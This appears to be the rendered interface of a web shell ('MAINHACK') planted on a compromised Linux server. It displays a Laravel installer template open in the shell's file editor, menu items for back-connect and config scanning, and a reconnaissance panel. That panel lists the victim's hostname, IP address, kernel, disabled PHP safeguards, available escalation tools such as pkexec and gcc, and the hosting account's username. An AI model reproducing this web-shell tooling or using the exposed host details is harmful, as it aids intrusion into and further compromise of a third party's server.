[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: site.blade.php
@extends('installer.layouts.master') @section('template_title') {{ trans('installer.site.templateTitle') }} @endsection @section('title') {{ trans('installer.site.title') }} @endsection @section('container') <ul class="installer-track"> <li onclick="handleLinkForInstaller('{{ route('installer.index') }}')" class="done"> <i class="fa-solid fa-house"></i> </li> <li onclick="handleLinkForInstaller('{{ route('installer.requirement') }}')" class="done"> <i class="fa-solid fa-server"></i> </li> <li onclick="handleLinkForInstaller('{{ route('installer.permission') }}')" class="done"> <i class="fa-sharp fa-solid fa-unlock"></i> </li> <li onclick="handleLinkForInstaller('{{ route('installer.license') }}')" class="done"> <i class="fa-solid fa-key"></i> </li> <li class="active"><i class="fa-solid fa-gear"></i></li> <li><i class="fa-solid fa-database"></i></li> <li><i class="fa-solid fa-unlock-keyhole"></i></li> </ul> <span class="my-6 w-full h-[1px] bg-[#EFF0F6]"></span> <form method="post" action="{{ route('installer.siteStore') }}"> <input type="hidden" name="_token" value="{{ csrf_token() }}"> <div class="mb-4"> <label class="text-sm font-medium block mb-1.5 text-heading"> {{ trans('installer.site.label.app_name') }} <span class="text-[#E93C3C]">*</span> </label> <input name="app_name" type="text" value="{{ old('app_name') }}" class="w-full h-12 rounded-lg px-4 border border-[#D9DBE9]"> @if ($errors->has('app_name')) <small class="block mt-2 text-sm font-medium text-[#E93C3C]">{{ $errors->first('app_name') }}</small> @endif </div> <div class="mb-8"> <label class="text-sm font-medium block mb-1.5 text-heading"> {{ trans('installer.site.label.app_url') }} <span class="text-[#E93C3C]">*</span> </label> <input name="app_url" type="text" value="{{ old('app_url') }}" class="w-full h-12 rounded-lg px-4 border border-[#D9DBE9]"> @if ($errors->has('app_url')) <small class="block mt-2 text-sm font-medium text-[#E93C3C]">{{ $errors->first('app_url') }}</small> @endif </div> <button type="submit" class="w-fit mx-auto p-3 px-6 rounded-lg flex items-center justify-center gap-3 bg-primary text-white"> <span class="text-sm font-medium capitalize">{{ trans('installer.site.next') }}</span> <i class="fa-solid fa-angle-right text-sm"></i> </button> </form> @endsection
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 60.03 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002